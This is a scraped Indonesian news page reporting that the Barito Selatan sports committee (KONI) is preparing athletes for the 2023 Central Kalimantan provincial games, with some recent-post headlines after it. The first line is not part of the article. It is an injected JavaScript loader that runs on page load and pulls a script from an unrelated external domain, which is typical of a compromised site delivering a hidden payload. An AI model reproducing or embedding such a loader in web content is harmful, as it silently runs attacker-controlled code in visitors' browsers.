(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Barito Selatan

KONI Barsel Persiapkan Cabor dan Atlet Porprov Kalteng 2023 di Kotim


KANALKALIMANTAN.COM, BUNTOK – KONI Kabupaten Barito Selatan (Barsel) gelar rapat harian bersama seluruh pengurus dan Ketua Cabang Olahraga (Cabor) persiapan Pekan Olahraga Provinsi (Porprov) Kalteng yang dilaksanakan di Kotawaringin Timur (Kotim) 2023 mendatang.

“Rapat kali ini untuk mengetahui sejauh mana Cabor yang ada untuk mempersiapkan atletnya pada Porprov nanti di Kotim,” kata Ketua KONI Barsel Idariani, di Secretariat KONI Barsel, Rabu (20/7/2022).

Ia mengatakan, KONI Barsel akan mengadakan seleksi terbuka, sehingga hasil atlet yang didapat dari enam kecamatan nantinya masuk menjadi tim memperkuat KONI Barsel.

“Termasuk uji tanding ke tempat yang dianggap bisa menjadi sparing partner, untuk mengukur kemampuan masing-masing Cabor kita,” beber Ida.

 

 

Baca juga: Sertifikasi Jadi ‘Senjata’ Pelaku Industri Meyakinkan Calon Pembeli!

Berkaca pada tahun 2018 lalu, Barsel menempati peringkat ke-9 perolehan medali Porprov di Barito Utara (Barut), Muara Teweh. Berharap di tahun 2023 peringkat Barsel naik bahkan tidak menutup kemungkinan juara.

“Dengan harapan semua bisa kita lakukan, masing-masing ketua cabor bersemangat untuk meraih medali,” kata Ida.

Ditambahkan oleh Ketua KONI Barsel, dengan keterbatasan dana maupun termasuk dari sponsor luar, Barsel dengan cara apapun harus dapat melaksanakannya.

“Dana bukan segalanya, tetapi segalanya butuh dana. Artinya, atlet yang membawa pulang medali nantinya, diharapkan Pemda memberikan kontribusi kepada atlet maupun pelatih yang mendampingi melalui bonus,” pungkas Ida. (Kanalkalimantan.com/digdo)

Reporter : digdo
Editor : kk


Risa

Recent Posts

2026 Kemendikdasmen Revitalisasi 11.744 Satuan Pendidikan, Kalsel Kebagian Rp232,9 M di 2025

KANALKALIMANTAN.COM, BANJARBARU - Kementerian Pendidikan Dasar dan Menengah (Kemendikdasmen) tegaskan komitmen meningkatkan kualitas sumber daya… Read More

2 jam ago

Musrenbang Kecamatan Selat Digelar, Ini Kata Wakil Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Musyawarah Perencanaan Pembangunan (Musrenbang) Tingkat Kecamatan Selat dalam rangka penyusunan Rencana… Read More

15 jam ago

Resmikan 166 Sekolah Rakyat, Prabowo Target 500 Sekolah Rakyat di 2029

KANALKALIMANTAN.COM, BANJARBARU - Presiden Republik Indonesia Prabowo Subianto didampingi sejumlah Menteri Kabinet Merah Putih dan… Read More

17 jam ago

Prabowo Janjikan Kampus Kedokteran Gratis

KANALKALIMANTAN.COM, BANJARBARU - Presiden Prabowo Subianto berkeinginan membuka banyak sekolah dan kampus. Ia memandang pendidikan… Read More

18 jam ago

Tiba di Banjarbaru, Presiden Prabowo Resmikan 166 Sekolah Rakyat

KANALKALIMANTAN.COM, BANJARBARU - Presiden Prabowo Subianto melakukan kunjungan kerja ke Kota Banjarbaru, Provinsi Kalimantan Selatan,… Read More

22 jam ago

Peluncuran Budaya Sekolah Aman dan Nyaman di Banjarbaru, Ini Kata Mendikdasmen Abdul Mu’ti

KANALKALIMANTAN.COM, BANJARBARU – Kota Banjarbaru menjadi salah satu titik penting peluncuran budaya sekolah aman dan… Read More

23 jam ago

This website uses cookies.